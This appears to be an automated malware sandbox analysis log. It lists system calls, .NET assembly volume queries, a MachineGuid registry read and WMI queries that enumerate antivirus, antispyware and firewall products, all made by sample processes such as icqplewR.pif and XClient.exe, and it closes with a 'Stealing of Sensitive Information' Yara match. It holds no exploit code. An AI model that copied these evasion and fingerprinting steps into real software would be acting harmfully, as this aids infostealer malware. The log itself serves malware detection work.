Source: C:\Users\user\Links\Rwelpqci.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 19_2_040755C7
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: GetLocaleInfoA, 19_2_0407A104
Source: C:\Users\user\Links\icqplewR.pif Code function: GetLocaleInfoA, 20_2_00417A20
Source: C:\Users\user\Links\icqplewR.pif Code function: GetLocaleInfoA, 20_1_00417A20
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F58B38 GetLocalTime, 3_2_03F58B38
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F69F00 GetUserNameA, 3_2_03F69F00
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 28_2_0040BBD4 GetTimeZoneInformation, 28_2_0040BBD4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5B038 GetVersionExA, 3_2_03F5B038
Source: C:\Users\user\Links\icqplewR.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 20.2.icqplewR.pif.1ce90f08.5.unpack, type: UNPACKEDPE
